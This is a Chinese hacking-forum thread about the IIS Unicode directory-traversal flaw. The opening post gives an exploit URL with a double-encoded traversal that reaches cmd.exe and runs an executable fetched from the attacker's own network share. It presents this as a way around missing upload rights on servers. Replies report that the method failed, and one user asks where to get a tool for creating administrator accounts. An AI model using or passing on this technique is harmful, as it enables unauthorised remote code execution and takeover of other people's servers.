20CN网络安全小组第一代论坛: 关于U洞的新用法

这是在 20CN网络安全小组第一代论坛 的论坛 安全漏洞 中的主题 关于U洞的新用法。

要查看这个主题，请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=3;t=000322

由 DevilDragon (编号: 5) 发表于 :

这个用法可能有的人已经想到了
不知道大家有没有碰到过这样的网站
scripts有cmd.exe?/c+dir可以用，但是没有任何权限能够copy文件
或tftp任何文件
管理员把整个硬盘的guest的写权限去了
虽然我们手上有创建管理员用户的程序，但是不能上传，也就不能在对方的
服务器上执行了
怎么办？
看看下面这个例子：
http://www.xxx.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+\\你的ip\共享目录\filename.exe
呵呵
这样服务器就会访问你的共享目录，然后执行filename.exe了
文件在你的机器上，但是却在服务器端执行，我们的目的达到了：）
最好你的机器是win98或fat32分区的nt
要不然服务器没有任何账号就没办法、读你共享目录下的文件了

转绿色兵团

由 网络之隼 (编号: 2209) 发表于 :

此方法在局域网中实验----失败。

由 GTO (编号: 3052) 发表于 :

请问创建管理员用户的程序哪里可以找到？我是一个菜鸟，请指教。

由 阴魂不散 (编号: 421) 发表于 :

行不通啊